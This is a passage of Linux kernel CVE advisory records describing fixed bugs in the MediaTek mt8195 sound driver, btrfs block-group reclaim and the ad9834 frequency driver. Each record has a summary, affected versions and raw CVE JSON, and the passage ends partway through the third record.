In the Linux kernel, the following vulnerability has been resolved: ASoC: mediatek: mt8195: Add platform entry for ETDM1_OUT_BE dai link Commit e70b8dd26711 ("ASoC: mediatek: mt8195: Remove afe-dai component and rework codec link") removed the codec entry for the ETDM1_OUT_BE dai link entirely instead of replacing it with COMP_EMPTY(). This worked by accident as the remaining COMP_EMPTY() platform entry became the codec entry, and the platform entry became completely empty, effectively the same as COMP_DUMMY() since snd_soc_fill_dummy_dai() doesn't do anything for platform entries. This causes a KASAN out-of-bounds warning in mtk_soundcard_common_probe() in sound/soc/mediatek/common/mtk-soundcard-driver.c: for_each_card_prelinks(card, i, dai_link) { if (adsp_node && !strncmp(dai_link->name, "AFE_SOF", strlen("AFE_SOF"))) dai_link->platforms->of_node = adsp_node; else if (!dai_link->platforms->name && !dai_link->platforms->of_node) dai_link->platforms->of_node = platform_node; } where the code expects the platforms array to have space for at least one entry. Add an COMP_EMPTY() entry so that dai_link->platforms has space.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/42b9ab7a4d7e6c5ef…
	https://git.kernel.org/stable/c/282a4482e198e0378…

Impacted products

Vendor

Product

Version

Linux

Affected: e70b8dd26711704b1ff1f1b4eb3d048ba69e29da , < 42b9ab7a4d7e6c5efd71847541e4fcc213585aad (git)
Affected: e70b8dd26711704b1ff1f1b4eb3d048ba69e29da , < 282a4482e198e03781c152c88aac8aa382ef9a55 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 6.9.8 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:54:32.140Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/42b9ab7a4d7e6c5efd71847541e4fcc213585aad"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/282a4482e198e03781c152c88aac8aa382ef9a55"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42088",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:18:47.495476Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:56.751Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "sound/soc/mediatek/mt8195/mt8195-mt6359.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "42b9ab7a4d7e6c5efd71847541e4fcc213585aad",
              "status": "affected",
              "version": "e70b8dd26711704b1ff1f1b4eb3d048ba69e29da",
              "versionType": "git"
            },
            {
              "lessThan": "282a4482e198e03781c152c88aac8aa382ef9a55",
              "status": "affected",
              "version": "e70b8dd26711704b1ff1f1b4eb3d048ba69e29da",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "sound/soc/mediatek/mt8195/mt8195-mt6359.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: mediatek: mt8195: Add platform entry for ETDM1_OUT_BE dai link\n\nCommit e70b8dd26711 (\"ASoC: mediatek: mt8195: Remove afe-dai component\nand rework codec link\") removed the codec entry for the ETDM1_OUT_BE\ndai link entirely instead of replacing it with COMP_EMPTY(). This worked\nby accident as the remaining COMP_EMPTY() platform entry became the codec\nentry, and the platform entry became completely empty, effectively the\nsame as COMP_DUMMY() since snd_soc_fill_dummy_dai() doesn\u0027t do anything\nfor platform entries.\n\nThis causes a KASAN out-of-bounds warning in mtk_soundcard_common_probe()\nin sound/soc/mediatek/common/mtk-soundcard-driver.c:\n\n\tfor_each_card_prelinks(card, i, dai_link) {\n\t\tif (adsp_node \u0026\u0026 !strncmp(dai_link-\u003ename, \"AFE_SOF\", strlen(\"AFE_SOF\")))\n\t\t\tdai_link-\u003eplatforms-\u003eof_node = adsp_node;\n\t\telse if (!dai_link-\u003eplatforms-\u003ename \u0026\u0026 !dai_link-\u003eplatforms-\u003eof_node)\n\t\t\tdai_link-\u003eplatforms-\u003eof_node = platform_node;\n\t}\n\nwhere the code expects the platforms array to have space for at least one entry.\n\nAdd an COMP_EMPTY() entry so that dai_link-\u003eplatforms has space."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:22:43.516Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/42b9ab7a4d7e6c5efd71847541e4fcc213585aad"
        },
        {
          "url": "https://git.kernel.org/stable/c/282a4482e198e03781c152c88aac8aa382ef9a55"
        }
      ],
      "title": "ASoC: mediatek: mt8195: Add platform entry for ETDM1_OUT_BE dai link",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42088",
    "datePublished": "2024-07-29T16:26:28.523Z",
    "dateReserved": "2024-07-29T15:50:41.171Z",
    "dateUpdated": "2025-05-04T09:22:43.516Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42103 (GCVE-0-2024-42103)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:45 – Updated: 2025-11-03 22:01

Title

btrfs: fix adding block group to a reclaim list and the unused list during reclaim

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: fix adding block group to a reclaim list and the unused list during reclaim There is a potential parallel list adding for retrying in btrfs_reclaim_bgs_work and adding to the unused list. Since the block group is removed from the reclaim list and it is on a relocation work, it can be added into the unused list in parallel. When that happens, adding it to the reclaim list will corrupt the list head and trigger list corruption like below. Fix it by taking fs_info->unused_bgs_lock. [177.504][T2585409] BTRFS error (device nullb1): error relocating ch= unk 2415919104 [177.514][T2585409] list_del corruption. next->prev should be ff1100= 0344b119c0, but was ff11000377e87c70. (next=3Dff110002390cd9c0) [177.529][T2585409] ------------[ cut here ]------------ [177.537][T2585409] kernel BUG at lib/list_debug.c:65! [177.545][T2585409] Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI [177.555][T2585409] CPU: 9 PID: 2585409 Comm: kworker/u128:2 Tainted: G W 6.10.0-rc5-kts #1 [177.568][T2585409] Hardware name: Supermicro SYS-520P-WTR/X12SPW-TF, BIOS 1.2 02/14/2022 [177.579][T2585409] Workqueue: events_unbound btrfs_reclaim_bgs_work[btrfs] [177.589][T2585409] RIP: 0010:__list_del_entry_valid_or_report.cold+0x70/0x72 [177.624][T2585409] RSP: 0018:ff11000377e87a70 EFLAGS: 00010286 [177.633][T2585409] RAX: 000000000000006d RBX: ff11000344b119c0 RCX:0000000000000000 [177.644][T2585409] RDX: 000000000000006d RSI: 0000000000000008 RDI:ffe21c006efd0f40 [177.655][T2585409] RBP: ff110002e0509f78 R08: 0000000000000001 R09:ffe21c006efd0f08 [177.665][T2585409] R10: ff11000377e87847 R11: 0000000000000000 R12:ff110002390cd9c0 [177.676][T2585409] R13: ff11000344b119c0 R14: ff110002e0508000 R15:dffffc0000000000 [177.687][T2585409] FS: 0000000000000000(0000) GS:ff11000fec880000(0000) knlGS:0000000000000000 [177.700][T2585409] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [177.709][T2585409] CR2: 00007f06bc7b1978 CR3: 0000001021e86005 CR4:0000000000771ef0 [177.720][T2585409] DR0: 0000000000000000 DR1: 0000000000000000 DR2:0000000000000000 [177.731][T2585409] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:0000000000000400 [177.742][T2585409] PKRU: 55555554 [177.748][T2585409] Call Trace: [177.753][T2585409] <TASK> [177.759][T2585409] ? __die_body.cold+0x19/0x27 [177.766][T2585409] ? die+0x2e/0x50 [177.772][T2585409] ? do_trap+0x1ea/0x2d0 [177.779][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72 [177.788][T2585409] ? do_error_trap+0xa3/0x160 [177.795][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72 [177.805][T2585409] ? handle_invalid_op+0x2c/0x40 [177.812][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72 [177.820][T2585409] ? exc_invalid_op+0x2d/0x40 [177.827][T2585409] ? asm_exc_invalid_op+0x1a/0x20 [177.834][T2585409] ? __list_del_entry_valid_or_report.cold+0x70/0x72 [177.843][T2585409] btrfs_delete_unused_bgs+0x3d9/0x14c0 [btrfs] There is a similar retry_list code in btrfs_delete_unused_bgs(), but it is safe, AFAICS. Since the block group was in the unused list, the used bytes should be 0 when it was added to the unused list. Then, it checks block_group->{used,reserved,pinned} are still 0 under the block_group->lock. So, they should be still eligible for the unused list, not the reclaim list. The reason it is safe there it's because because we're holding space_info->groups_sem in write mode. That means no other task can allocate from the block group, so while we are at deleted_unused_bgs() it's not possible for other tasks to allocate and deallocate extents from the block group, so it can't be added to the unused list or the reclaim list by anyone else. The bug can be reproduced by btrfs/166 after a few rounds. In practice this can be hit when relocation cannot find more chunk space and ends with ENOSPC.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/522b39bd7163e8dc4…
	https://git.kernel.org/stable/c/aa1d8cc0cc500e06b…
	https://git.kernel.org/stable/c/f8e960be923f74a27…
	https://git.kernel.org/stable/c/326fa14549d7969ef…
	https://git.kernel.org/stable/c/48f091fd50b2eb33a…

Impacted products

Vendor

Product

Version

Linux

Affected: 2311fd03027d2c1b2ac4a3a41153a16352659b65 , < 522b39bd7163e8dc49f8cf10b9b782218ac48746 (git)
Affected: 15cb476ceb7da730857b8e94f06161273adb7a3a , < aa1d8cc0cc500e06b316cd6732d4e6c1388fe33c (git)
Affected: bf1e8c21f2bef7dfcdadc93b0bb2e8723639d5f7 , < f8e960be923f74a273c62478c9cab9523936752b (git)
Affected: ab58fe210c40e582a9fd3d122ae21071adb5470a , < 326fa14549d7969ef80d3f5beea5470cd1c8e67f (git)
Affected: 4eb4e85c4f818491efc67e9373aa16b123c3f522 , < 48f091fd50b2eb33ae5eaea9ed3c4f81603acf38 (git)

Linux

Affected: 5.15.162 , < 5.15.163 (semver)
Affected: 6.1.96 , < 6.1.98 (semver)
Affected: 6.6.36 , < 6.6.39 (semver)
Affected: 6.9.7 , < 6.9.9 (semver)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:38.141Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/522b39bd7163e8dc49f8cf10b9b782218ac48746"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/aa1d8cc0cc500e06b316cd6732d4e6c1388fe33c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f8e960be923f74a273c62478c9cab9523936752b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/326fa14549d7969ef80d3f5beea5470cd1c8e67f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/48f091fd50b2eb33ae5eaea9ed3c4f81603acf38"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42103",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:17:56.057327Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:49.448Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/block-group.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "522b39bd7163e8dc49f8cf10b9b782218ac48746",
              "status": "affected",
              "version": "2311fd03027d2c1b2ac4a3a41153a16352659b65",
              "versionType": "git"
            },
            {
              "lessThan": "aa1d8cc0cc500e06b316cd6732d4e6c1388fe33c",
              "status": "affected",
              "version": "15cb476ceb7da730857b8e94f06161273adb7a3a",
              "versionType": "git"
            },
            {
              "lessThan": "f8e960be923f74a273c62478c9cab9523936752b",
              "status": "affected",
              "version": "bf1e8c21f2bef7dfcdadc93b0bb2e8723639d5f7",
              "versionType": "git"
            },
            {
              "lessThan": "326fa14549d7969ef80d3f5beea5470cd1c8e67f",
              "status": "affected",
              "version": "ab58fe210c40e582a9fd3d122ae21071adb5470a",
              "versionType": "git"
            },
            {
              "lessThan": "48f091fd50b2eb33ae5eaea9ed3c4f81603acf38",
              "status": "affected",
              "version": "4eb4e85c4f818491efc67e9373aa16b123c3f522",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/block-group.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.15.163",
              "status": "affected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThan": "6.1.98",
              "status": "affected",
              "version": "6.1.96",
              "versionType": "semver"
            },
            {
              "lessThan": "6.6.39",
              "status": "affected",
              "version": "6.6.36",
              "versionType": "semver"
            },
            {
              "lessThan": "6.9.9",
              "status": "affected",
              "version": "6.9.7",
              "versionType": "semver"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "5.15.162",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "6.1.96",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "6.6.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "6.9.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix adding block group to a reclaim list and the unused list during reclaim\n\nThere is a potential parallel list adding for retrying in\nbtrfs_reclaim_bgs_work and adding to the unused list. Since the block\ngroup is removed from the reclaim list and it is on a relocation work,\nit can be added into the unused list in parallel. When that happens,\nadding it to the reclaim list will corrupt the list head and trigger\nlist corruption like below.\n\nFix it by taking fs_info-\u003eunused_bgs_lock.\n\n  [177.504][T2585409] BTRFS error (device nullb1): error relocating ch= unk 2415919104\n  [177.514][T2585409] list_del corruption. next-\u003eprev should be ff1100= 0344b119c0, but was ff11000377e87c70. (next=3Dff110002390cd9c0)\n  [177.529][T2585409] ------------[ cut here ]------------\n  [177.537][T2585409] kernel BUG at lib/list_debug.c:65!\n  [177.545][T2585409] Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\n  [177.555][T2585409] CPU: 9 PID: 2585409 Comm: kworker/u128:2 Tainted: G        W          6.10.0-rc5-kts #1\n  [177.568][T2585409] Hardware name: Supermicro SYS-520P-WTR/X12SPW-TF, BIOS 1.2 02/14/2022\n  [177.579][T2585409] Workqueue: events_unbound btrfs_reclaim_bgs_work[btrfs]\n  [177.589][T2585409] RIP: 0010:__list_del_entry_valid_or_report.cold+0x70/0x72\n  [177.624][T2585409] RSP: 0018:ff11000377e87a70 EFLAGS: 00010286\n  [177.633][T2585409] RAX: 000000000000006d RBX: ff11000344b119c0 RCX:0000000000000000\n  [177.644][T2585409] RDX: 000000000000006d RSI: 0000000000000008 RDI:ffe21c006efd0f40\n  [177.655][T2585409] RBP: ff110002e0509f78 R08: 0000000000000001 R09:ffe21c006efd0f08\n  [177.665][T2585409] R10: ff11000377e87847 R11: 0000000000000000 R12:ff110002390cd9c0\n  [177.676][T2585409] R13: ff11000344b119c0 R14: ff110002e0508000 R15:dffffc0000000000\n  [177.687][T2585409] FS:  0000000000000000(0000) GS:ff11000fec880000(0000) knlGS:0000000000000000\n  [177.700][T2585409] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n  [177.709][T2585409] CR2: 00007f06bc7b1978 CR3: 0000001021e86005 CR4:0000000000771ef0\n  [177.720][T2585409] DR0: 0000000000000000 DR1: 0000000000000000 DR2:0000000000000000\n  [177.731][T2585409] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:0000000000000400\n  [177.742][T2585409] PKRU: 55555554\n  [177.748][T2585409] Call Trace:\n  [177.753][T2585409]  \u003cTASK\u003e\n  [177.759][T2585409]  ? __die_body.cold+0x19/0x27\n  [177.766][T2585409]  ? die+0x2e/0x50\n  [177.772][T2585409]  ? do_trap+0x1ea/0x2d0\n  [177.779][T2585409]  ? __list_del_entry_valid_or_report.cold+0x70/0x72\n  [177.788][T2585409]  ? do_error_trap+0xa3/0x160\n  [177.795][T2585409]  ? __list_del_entry_valid_or_report.cold+0x70/0x72\n  [177.805][T2585409]  ? handle_invalid_op+0x2c/0x40\n  [177.812][T2585409]  ? __list_del_entry_valid_or_report.cold+0x70/0x72\n  [177.820][T2585409]  ? exc_invalid_op+0x2d/0x40\n  [177.827][T2585409]  ? asm_exc_invalid_op+0x1a/0x20\n  [177.834][T2585409]  ? __list_del_entry_valid_or_report.cold+0x70/0x72\n  [177.843][T2585409]  btrfs_delete_unused_bgs+0x3d9/0x14c0 [btrfs]\n\nThere is a similar retry_list code in btrfs_delete_unused_bgs(), but it is\nsafe, AFAICS. Since the block group was in the unused list, the used bytes\nshould be 0 when it was added to the unused list. Then, it checks\nblock_group-\u003e{used,reserved,pinned} are still 0 under the\nblock_group-\u003elock. So, they should be still eligible for the unused list,\nnot the reclaim list.\n\nThe reason it is safe there it\u0027s because because we\u0027re holding\nspace_info-\u003egroups_sem in write mode.\n\nThat means no other task can allocate from the block group, so while we\nare at deleted_unused_bgs() it\u0027s not possible for other tasks to\nallocate and deallocate extents from the block group, so it can\u0027t be\nadded to the unused list or the reclaim list by anyone else.\n\nThe bug can be reproduced by btrfs/166 after a few rounds. In practice\nthis can be hit when relocation cannot find more chunk space and ends\nwith ENOSPC."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:23:04.780Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/522b39bd7163e8dc49f8cf10b9b782218ac48746"
        },
        {
          "url": "https://git.kernel.org/stable/c/aa1d8cc0cc500e06b316cd6732d4e6c1388fe33c"
        },
        {
          "url": "https://git.kernel.org/stable/c/f8e960be923f74a273c62478c9cab9523936752b"
        },
        {
          "url": "https://git.kernel.org/stable/c/326fa14549d7969ef80d3f5beea5470cd1c8e67f"
        },
        {
          "url": "https://git.kernel.org/stable/c/48f091fd50b2eb33ae5eaea9ed3c4f81603acf38"
        }
      ],
      "title": "btrfs: fix adding block group to a reclaim list and the unused list during reclaim",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42103",
    "datePublished": "2024-07-30T07:45:59.220Z",
    "dateReserved": "2024-07-29T15:50:41.175Z",
    "dateUpdated": "2025-11-03T22:01:38.141Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-47663 (GCVE-0-2024-47663)

Vulnerability from cvelistv5 – Published: 2024-10-09 14:13 – Updated: 2025-11-03 22:20

Title

staging: iio: frequency: ad9834: Validate frequency parameter value

Summary

In the Linux kernel, the following vulnerability has been resolved: staging: iio: frequency: ad9834: Validate frequency parameter value In ad9834_write_frequency() clk_get_rate() can return 0. In such case ad9834_calc_freqreg() call will lead to division by zero. Checking 'if (fout > (clk_freq / 2))' doesn't protect in case of 'fout' is 0. ad9834_write_frequency() is called from ad9834_write(), where fout is taken from text buffer, which can contain any value. Modify parameters checking. Found by Linux Verification Center (linuxtesting.org) with SVACE.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5edc3a45ef4285010…
	https://git.kernel.org/stable/c/0e727707a239d5c51…
	https://git.kernel.org/stable/c/41cc91e3138fe52f8…
	https://git.kernel.org/stable/c/d8b09a5edc4a63437…
	https://git.kernel.org/stable/c/3ba9abfcaa9e16bb9…
	https://git.kernel.org/stable/c/dc12e49f970b08d8b…
	https://git.kernel.org/stable/c/8961b245e8f92bccb…
	https://git.kernel.org/stable/c/b48aa991758999d4e…

Impacted products

Vendor

Product

Version

Linux

Affected: 12b9d5bf76bfa20d3207ef24fca9c8254a586a58 , < 5edc3a45ef428501000a7b23d0e1777a548907f6 (git)
Affected: 12b9d5bf76bfa20d3207ef24fca9c8254a586a58 , < 0e727707a239d5c519fc9abc2f0fd913516a7e47 (git)
Affected: 12b9d5bf76bfa20d3207ef24fca9c8254a586a58 , < 41cc91e3138fe52f8da92a81bebcd0e6cf488c53 (git)
Affected: 12b9d5bf76bfa20d3207ef24fca9c8254a586a58 , < d8b09a5edc4a634373158c1a405491de3c52e58a (git)
Affected: 12b9d5bf76bfa20d3207ef24fca9c8254a586a58 , < 3ba9abfcaa9e16bb91ed7e0e2b42e94a157a953e (git)
Affected: 12b9d5bf76bfa20d3207ef24fca9c8254a586a58 , < dc12e49f970b08d8b007b8981b97e2eb93c0e89d (git)
Affected: 12b9d5bf76bfa20d3207ef24fca9c8254a586a58 , < 8961b245e8f92bccbaacfbbdf69eba60e3e7c227 (git)
Affected: 12b9d5bf76bfa20d3207ef24fca9c8254a586a58 , < b48aa991758999d4e8f9296c5bbe388f293ef465 (git)

Linux

Affected: 2.6.38
Unaffected: 0 , < 2.6.38 (semver)
Unaffected: 4.19.323 , ≤ 4.19.* (semver)
Unaffected: 5.4.284 , ≤ 5.4.* (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.110 , ≤ 6.1.* (semver)
Unaffected: 6.6.51 , ≤ 6.6.* (semver)
Unaffected: 6.10.10 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-47663",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-10-10T13:22:28.473649Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-10T13:22:42.368Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:20:26.126Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/staging/iio/frequency/ad9834.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5edc3a45ef428501000a7b23d0e1777a548907f6",
              "status": "affected",
              "version": "12b9d5bf76bfa20d3207ef24fca9c8254a586a58",
              "versionType": "git"
            },
            {
              "lessThan": "0e727707a239d5c519fc9abc2f0fd913516a7e47",
              "status": "affected",
              "version": "12b9d5bf76bfa20d3207ef24fca9c8254a586a58",
              "versionType": "git"
            },
            {
              "lessThan": "41cc91e3138fe52f8da92a81bebcd0e6cf488c53",
              "status": "affected",
              "version": "12b9d5bf76bfa20d3207ef24fca9c8254a586a58",
              "versionType": "git"
            },
            {
              "lessThan": "d8b09a5edc4a634373158c1a405491de3c52e58a",
              "status": "affected",
              "version": "12b9d5bf76bfa20d3207ef24fca9c8254a586a58",
              "versionType": "git"
            },
            {
              "lessThan": "3ba9abfcaa9e16bb91ed7e0e2b42e94a157a953e",
              "status": "affected",
              "version": "12b9d5bf76bfa20d3207ef24fca9c8254a586a58",
              "versionType": "git"
            },
            {
              "lessThan": "dc12e49f970b08d8b007b8981b97e2eb93c0e89d",
              "status": "affected",
              "version": "12b9d5bf76bfa20d3207ef24fca9c8254a586a58",
              "versionType": "git"
            },
            {
              "lessThan": "8961b245e8f92bccbaacfbbdf69eba60e3e7c227",
              "status": "affected",
              "version": "12b9d5bf76bfa20d3207ef24fca9c8254a586a58",
              "versionType": "git"
            },
            {
              "lessThan": "b48aa991758999d4e8f9296c5bbe388f293ef465",
              "status": "affected",
              "version": "12b9d5bf76bfa20d3207ef24fca9c8254a586a58",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/staging/iio/frequency/ad9834.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.38"
            },
            {
              "lessThan": "2.6.38",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.323",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.284",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.110",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.51",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.323",
                  "versionStartIncluding": "2.6.38",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.284",
                  "versionStartIncluding": "2.6.38",
